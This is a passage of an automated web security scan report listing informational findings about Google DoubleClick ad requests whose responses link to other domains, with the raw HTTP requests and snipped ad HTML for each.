Date: Sun, 24 Apr 2011 16:32:31 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dcoastlinemicro.com/rackserver%26adT%3DOptimized%2BRack%2BServer%26adU%3Dtripplite.com/RackSolutions%26adT%3DOpen%2BFrame%2BRacks%26gl%3DUS&amp;usg=AFQjCNFKtpZy5baZD3bbxLZ_y2s1Sg-5Mg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.269. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303687566&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Fcontrolcasecom-contact%2Freflected-xss-cwe-79-ghdb-report-example-poc.html&dt=1303669566155&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303669566174&frm=0&adk=2466456225&ga_vid=331318885.1303669566&ga_sid=1303669566&ga_hid=1554142888&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=907&eid=33895130&fu=0&ifi=1&dtd=40&xpc=wN3e0baJq4&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 18:25:56 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4352

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/controlcasecom-contact/reflected-xss-cwe-79-ghdb-report-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com/SportKayaks.aspx%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFY2xjHvK-SXrfGUzVRT6_JcdfABQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.270. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676642&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658642845&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658642849&frm=1&adk=2614322350&ga_vid=89410918.1303658643&ga_sid=1303658643&ga_hid=1796920425&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&eid=33895132&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:24:00 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2163

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25805860&ahcid=973433&bimpd=KcL-dYVrd1LHDnQorXWd06JuB3ZsWJanuRCeZ79ASSwwZDmrtwDCMVQgQ9kqp0OM2DM-fY4Y1621GbWJDt0Ylq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BKRgeMWOxnhllrTwR4fSEloqXHg5ybSqorAUuT7WodTias5odc_fN8lrM1sP_YEU8L8QXAnSoShrDHVAIaX5P2UXYkMwDMhThyDTSkJz17--1yYfUx0aSWjU5rLek88zmFr8VI-VhbAS9dWBM1kZBJwYfsAjue5PSL-h0Ho2t7SEPQ132Ppbuk7ijoUndfzz7rjO3SD4VdqcfcG-eEfpQLVpn1pX92TXvJ5-KusSxbhSpzPMafoj1ZGi5kyWVEWKxwaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-Q4-qt8dRxfRrYf9CqeMIgg4DbfNAl_25G-CXhfHV44tX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3iNpimYF7PyrXxKau66bMUFxM9Cpxmh6ci9ZEp0Ip-5iiZvJnZAWhwjW9SAf1pZAjbt_T370WDWWY1SqEwEJwbh74bkML2wXdcAojXeE04DSM7CYAs_o3XcXMAh-wjz3-xA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbRAjwANFgwK5TqKJzYiJ-pjsjysanZM1w5mcw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBN9_Aj0C0TYysNIr1lAenxNi5AsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtzbeNgLdPCbfD3Ds5szuyDluw_7WA%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.271. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680941&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662941072&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662941083&frm=1&adk=2614322350&ga_vid=897016059.1303662941&ga_sid=1303662941&ga_hid=1123526555&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=13 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:35:38 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14964

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BServer%2BSolutions%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dtripplite.com/RackSolutions%26adT%3DOpen%2BFrame%2BRacks%26adU%3Dwww.asaservers.com%26adT%3DASA%2B4U%2BServers%26gl%3DUS&amp;usg=AFQjCNFnCDwIWO9O0XiKhQTUjIoPr8Gx9g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.272. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681865&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663865478&bpp=16&shv=r20110420&jsv=r20110415&correlator=1303663865496&frm=1&adk=2614322350&ga_vid=1538346491.1303663866&ga_sid=1303663866&ga_hid=2007194349&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=33895132&fu=4&ifi=1&dtd=121 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:51:02 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1394

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RilLTaqf1_958911823.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUF8R0ZVeWQxclZsYXwxMzAzNjYzODY0NzY1fDF8MEZTb3MxV1lvZXwwUmlsTFRhcWYxfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDYxMTg4MQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRU9gAKcZcK7GWLyoFKWsZOaIGHRR4fdymMmw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZTb3MxV1lvZQ&ciu=MFJpbExUYXFmMQ&reqid=NERCNDU0RjYwMDBBNzE5NzBBRUM2NThCQ0E4MTRBNUE&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=611&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.273. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634845&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F23%2Fdork%2Fsecureidentityguardcom%2Fapache-mod-rewrite-off-by-one-buffer-overflow-vulnerability-dork-ghdb-poc-example-report.html&dt=1303616845243&bpp=5&shv=r20110414&jsv=r20110415&correlator=1303616845251&frm=0&adk=1607234649&ga_vid=2065049722.1303616845&ga_sid=1303616845&ga_hid=943068844&ga_fc=0&u_tz=-300&u_his=10&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=27&xpc=wncD24Liaw&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 03:47:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 6769

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CPeht6n5qZy8WRDYBRhaMgjz2BmTkCHVGA">
...[SNIP]...
ca6%253Dad_ntwk%2526cm_mmca7%253D728x90_-_GCN_Display_-_Explorer%2526cm_mmca8%253Daptm%2526cm_mmca9%253Dcontext_audience%2526cm_mmca11%253Dcpc%2526cm_mmca12%253Ddr%2526cm_mmca13%253D1%2526vrefid%253D"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CPeht6n5qZy8WRDYBRhaMgjz2BmTkCHVGA" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBeVhKS52zTda1EMv1lAelyKDjCbPw4_cBw4iapxij3_6OWvCyUhABGAEgvs7lDTgAUNedrZ4FYMnug4jwo-wSoAHxp8rzA7oBCTcyOHg5MF9hc8gBBNoBkwFmaWxlOi8vL0M6L2Nkbi8yMDExLzA0LzIzL2Rvcmsvc2VjdXJlaWRlbnRpdHlndWFyZGNvbS9hcGFjaGUtbW9kLXJld3JpdGUtb2ZmLWJ5LW9uZS1idWZmZXItb3ZlcmZsb3ctdnVsbmVyYWJpbGl0eS1kb3JrLWdoZGItcG9jLWV4YW1wbGUtcmVwb3J0Lmh0bWz4AQG4AhjAAgHIApO1gBaoAwHoA7oC6APuA_UDAAAAxA%26num%3D1%26sig%3DAGiWqtwXMCwKEzRZqO0obWobv-t5cOrQ-w%26client%3Dca-pub-4063878933780912%26adurl%3Dhttp://ad.doubleclick.net/clk%253B225027794%253B48840119%253Bm%253Fhttp://aptm.phoenix.edu/%253Fcreative_desc%253D6432178747%2526provider%253Dgooglecontent%2526keyword%253D728x90_-_GCN_Display_-_Explorer%2526user3%253D1%2526unit%253Ddir%2526channel%253Dbanr%2526initiative%253Dgen%2526mktg_prog%253Dgen%2526placement%253Ddsply%2526version%253D728x90%2526classification%253Dad_ntwk%2526destination%253Daptm%2526distribution%253Dcontext_audience%2526user1%253Dcpc%2526user2%253Ddr%2526creative_id%253D11111111%2526pvp_campaign%253D14610_0957_9_95%2526cm_mmc%253Ddir-_-banr-_-googlecontent-_-gen%2526cm_mmca1%253Dgen%2526cm_mmca2%253Ddsply%2526cm_mmca3%253D11111111%2526cm_mmca4%253D6432178747%2526cm_mmca5%253D728x90%2526cm_mmca6%253Dad_ntwk%2526cm_mmca7%253D728x90_-_GCN_Display_-_Explorer%2526cm_mmca8%253Daptm%2526cm_mmca9%253Dcontext_audience%2526cm_mmca11%253Dcpc%2526cm_mmca12%253Ddr%2526cm_mmca13%253D1%2526vrefid%253D" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/23/dork/secureidentityguardcom/apache-mod-rewrite-off-by-one-buffer-overflow-vulnerability-dork-ghdb-poc-example-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhoenix.edu%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNH2F822NbD9gCsRgLQtNGKaZDoSsA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.274. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679367&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661367342&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303661367348&frm=1&adk=2614322350&ga_vid=1220375477.1303661367&ga_sid=1303661367&ga_hid=697341552&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36815001&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:09:24 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14533

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3Dwww.mturk.com/solution_provider.com%26adT%3DCrowdControl%26adU%3DMatureSinglesOnly.com/Video%26adT%3DSingle%2Band%2BOver%2B40%253F%26gl%3DUS&amp;usg=AFQjCNH3FY2TpHdaP2OknBjsDtn0P--gzg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.275. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680735&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662735800&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662735812&frm=1&adk=2614322350&ga_vid=273036336.1303662736&ga_sid=1303662736&ga_hid=1991820173&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:32:13 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1393

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
